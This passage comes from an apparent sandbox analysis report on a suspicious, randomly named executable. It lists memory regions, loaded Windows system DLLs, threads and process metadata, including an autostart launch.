0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7374 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7375 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7376 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7377 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7730 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7731 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7732 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7733 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 7734 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7735 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7736 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7737 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7738 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7739 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7740 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7741 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7742 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7743 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7744 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7745 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7746 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7747 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7748 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7749 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7750 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7751 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7832 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7833 start_va = 0x860000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 7834 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7835 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7836 start_va = 0x960000 end_va = 0xae7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 7837 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 260 os_tid = 0x10b4 Thread: id = 284 os_tid = 0x12bc Thread: id = 285 os_tid = 0x84c Process: id = "93" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x10b34000" os_pid = "0x1398" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6984 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6985 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6986 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6987 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6988 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6989 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6990 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6991 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6992 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6993 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6994 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6995 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6996 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6997 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6998 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6999 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7378 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 7379 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7380 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7381 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7382 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7383 start_va = 0x540000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7384 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7385 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7386 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7387 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7388 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7752 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7753 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7754 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7755 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 7756 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 7757 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7758 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7759 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7760 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7761 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7762 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7763 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7764 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7765 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7766 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7767 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7768 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7769 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7770 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7771 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7772 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7773 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7774 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7775 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7838 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7839 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 7840 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7841 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 7842 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 261 os_tid = 0x10bc Thread: id = 286 os_tid = 0x768 Thread: id = 287 os_tid = 0x838 Process: id = "94" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x370c7000" os_pid = "0xca4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x67c" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010306" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7962 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7963 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7964 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7965 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7966 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7967 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7968 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7969 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7970 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 7971 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 7972 start_va = 0x77ce0000 end_va = 0x77e5afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7973 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7974 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7975 start_va = 0x7fff0000 end_va = 0x7ffdac8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7976 start_va = 0x7ffdac8b0000 end_va = 0x7ffdaca70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7977 start_va = 0x7ffdaca71000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdaca71000" filename = "" Region: id = 8114 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 8115 start_va = 0x656d0000 end_va = 0x6571ffff monitored = 0 entry_point = 0x656e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8116 start_va = 0x65720000 end_va = 0x65799fff monitored = 0 entry_point = 0x65733290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8117 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8118 start_va = 0x657a0000 end_va = 0x657a7fff monitored = 0 entry_point = 0x657a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8119 start_va = 0x560000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 8120 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8121 start_va = 0x75220000 end_va = 0x7539dfff monitored = 0 entry_point = 0x752d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8122 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8123 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 8124 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8125 start_va = 0x74960000 end_va = 0x749f1fff monitored = 0 entry_point = 0x749a0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 8126 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 8127 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8128 start_va = 0x75b50000 end_va = 0x75c96fff monitored = 0 entry_point = 0x75b61cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8129 start_va = 0x75cb0000 end_va = 0x75dfefff monitored = 0 entry_point = 0x75d66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8130 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8131 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 8132 start_va = 0x761c0000 end_va = 0x775befff monitored = 0 entry_point = 0x7637b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 8133 start_va = 0x75e00000 end_va = 0x75ebdfff monitored = 0 entry_point = 0x75e35630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8134 start_va = 0x75140000 end_va = 0x75176fff monitored = 0 entry_point = 0x75143b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 8135 start_va = 0x754b0000 end_va = 0x759a8fff monitored = 0 entry_point = 0x756b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 8136 start_va = 0x77810000 end_va = 0x779ccfff monitored = 0 entry_point = 0x778f2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") 